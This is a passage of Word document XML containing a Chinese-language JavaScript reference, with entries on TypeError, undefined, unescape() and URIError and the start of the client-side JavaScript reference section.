      <w:r>
        <w:t>方法、</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数以及</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>函数都可能抛出这种类型的异常。关于异常的抛出及捕获的细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error</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Error</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="777" w:name="TypeError"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="777"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个值类型错误时抛出</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TypeError()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:t>TypeError(message)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t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条可选的错误消息，提供关于该异常的细节。如果指定，这个参数将用做对应的</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个新构建的</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象将把这个参数用做它的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值；在其他情况下，它将使用预定义的默认字符串作为这个属性的值。当不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符将</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数当做一个函数调用时，它的行为和带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用时一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条提</w:t>
      </w:r>
      <w:r>
        <w:t>供关于该异常的细节的错误消息。这个属性的值为传入构造函数的字符串，或者为一个预定义的默认字符串。细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>。</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一个指定该异常的类型的字符串。所有</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的这个属性都继承自值</w:t>
      </w:r>
      <w:r>
        <w:t>"TypeError"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个值不是期望的类型时，将抛出</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>类的一个实例。通常在访问一个值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的属性时会发生这个错误。例如，如果在一个类中定义某个方法，但在另一个类的实例上调用</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法时，或者在非构造函数上使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符时，都会发生这个错误</w:t>
      </w:r>
      <w:r>
        <w:t>。当向内置的函数或方法传入多于预期的参数时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现也允许抛出</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。关于抛出和捕获异常的细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error</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Error</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="778" w:name="undefined"/>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:bookmarkEnd w:id="778"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>未定义值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局属性，值为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>未定义的值。当试图读一个不存在的对象属性时，返回的就是这个值。</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>属性不可在</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环中枚举，也不可使用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符删除。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>不是一个常量，它可以设置成其他值，但你要小心避免这样的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>测试一个值是否为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>时要使用</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，因为</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符会把</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值等同于</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="779" w:name="unescape__"/>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="779"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已弃用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解码一个编码的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unescape(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>待解码的</w:t>
      </w:r>
      <w:r>
        <w:t>字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解码后的</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局函数，用于解码由</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>编码的字符串。它的解码方式为：寻找</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中格式为</w:t>
      </w:r>
      <w:r>
        <w:t>%xx</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>%u xxxx</w:t>
      </w:r>
      <w:r>
        <w:t>（这儿</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>十六进制数字）的字符序列，并将它们替换为</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符</w:t>
      </w:r>
      <w:r>
        <w:t>\u00 xx</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>\u xxxx</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>虽然在第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>版</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>中标准化了</w:t>
      </w:r>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
      <w:r>
        <w:t>，但在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>版中它已弃用并移除。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现可能实现了这个函数，但这并不是必需的。应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURICom</w:t>
      </w:r>
      <w:r>
        <w:t>ponent()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
      <w:r>
        <w:t>。更多的细节及示例可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>decodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="780" w:name="URIError"/>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="780"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>编码或解码方法出错时抛出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:t>→URIError</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URIError()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new URIError(message)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条可选的错误消息，提供关于该异常的详细信息。如果指定，则这个参数将用做对应的</w:t>
      </w:r>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新构建的</w:t>
      </w:r>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象将把它用做其</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值；在其他情况下，它将使用一个预定义的默认字符串作为该属性的值。当不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符将</w:t>
      </w:r>
      <w:r>
        <w:t>URIError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数像一个函数一样调用时，它的行为和带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用时一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条提供关于该异常的细节的错误消息。这个属性的值为传入构造函数的字符串，或者为预定义的默认字符串。细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个指定该异常的类型的字符串。所有的</w:t>
      </w:r>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>象的这个属性都继承自值</w:t>
      </w:r>
      <w:r>
        <w:t>"URIError"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>时，如果指定的字符串包含不合法的十六进制编码，则将抛出</w:t>
      </w:r>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
      <w:r>
        <w:t>类的一个实例。同样，如果指定的字符串包含不合法的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>代理项对</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>也会抛出这个异常。关于异常的抛出和捕获的细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="781" w:name="_1_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="781"/>
      <w:r>
        <w:t>一个值时也行，只要不是数值，比如</w:t>
      </w:r>
      <w:r>
        <w:t>new Arr</w:t>
      </w:r>
      <w:r>
        <w:t>ay('1')</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="782" w:name="Di_Si_Bu_Fen__Ke_Hu_Duan_JavaScriptCan_K"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第四部分　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="782"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书这个部分是一份客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>参考手册，包含若干重要的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的条目，例如</w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHTTPRequest</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>。同时，也有</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库的一个条目。这些条目根据字母顺序进行排序，每一个条目中都有该对象支持的常量、属性、方法以及事件处理程序的完整清单。</w:t>
      </w:r>
    </w:p>
